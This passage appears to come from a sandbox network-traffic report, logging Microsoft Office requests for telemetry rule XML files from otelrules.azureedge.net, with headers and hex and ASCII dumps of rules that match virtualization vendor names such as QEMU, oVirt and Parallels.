                                          2024-11-18 22:44:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          81192.168.2.45736013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:56 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:56 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 485
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                          ETag: "0x8DC582BB9769355"
                                          x-ms-request-id: cb36dd23-401e-0067-3b09-3709c2000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224456Z-16547b76f7fd4rc5hC1DFWkzhw00000006sg000000009nex
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:56 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          82192.168.2.45736213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:56 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:56 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 470
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                          ETag: "0x8DC582BBB181F65"
                                          x-ms-request-id: 97aad9f7-301e-0033-55ff-39fa9c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224456Z-17cf5b775c4jp6njhC1DFW19kn00000000dg00000000461p
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:56 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          83192.168.2.45736113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:56 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:56 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 411
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                          ETag: "0x8DC582B989AF051"
                                          x-ms-request-id: 2bae05a1-901e-00a0-0ba2-376a6d000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224456Z-16547b76f7fpdsp9hC1DFW8f5000000003z000000000qmg0
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:56 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          84192.168.2.45736313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:57 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 427
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                          ETag: "0x8DC582BB556A907"
                                          x-ms-request-id: f3ae074e-d01e-0082-62af-36e489000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224457Z-1866b5c5fbblmqrkhC1DFWf9ns00000004ng000000006teb
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          85192.168.2.45736413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:57 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 502
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB6A0D312"
                                          x-ms-request-id: a9097ed3-401e-0064-107c-3754af000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224457Z-164f84587bftbpb6hC1DFWm4kg0000000530000000010s3k
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:57 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          86192.168.2.45736513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:57 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 407
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                          ETag: "0x8DC582B9D30478D"
                                          x-ms-request-id: cf25fe23-201e-0000-80af-36a537000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224457Z-16547b76f7fbkfmzhC1DFWm9tw000000062g00000000e6af
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:57 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          87192.168.2.45736613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:57 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 474
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                          ETag: "0x8DC582BB3F48DAE"
                                          x-ms-request-id: bb2e9763-101e-0079-2c7d-375913000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224457Z-164f84587bftbpb6hC1DFWm4kg000000058g000000007b6y
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          88192.168.2.45736713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:57 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 408
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                          ETag: "0x8DC582BB9B6040B"
                                          x-ms-request-id: 7acd991b-701e-000d-31ef-376de3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224457Z-17cf5b775c4jp6njhC1DFW19kn00000000g0000000003hvk
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:57 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          89192.168.2.45736813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:57 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:58 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 469
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                          ETag: "0x8DC582BB3CAEBB8"
                                          x-ms-request-id: 4163e43d-001e-0049-7f9d-375bd5000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-164f84587bfjxw6fhC1DFWq94400000006hg00000000qep1
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:58 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          90192.168.2.45736913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:58 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 416
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                          ETag: "0x8DC582BB5284CCE"
                                          x-ms-request-id: a5808a03-d01e-002b-349b-3825fb000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-16547b76f7f9s8x7hC1DFWywrg000000063g000000010bdm
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:58 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          91192.168.2.45737113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:58 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 432
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                          ETag: "0x8DC582BAABA2A10"
                                          x-ms-request-id: d0d1667b-a01e-000d-1d09-37d1ea000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-16547b76f7fbkfmzhC1DFWm9tw000000061000000000nxyt
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
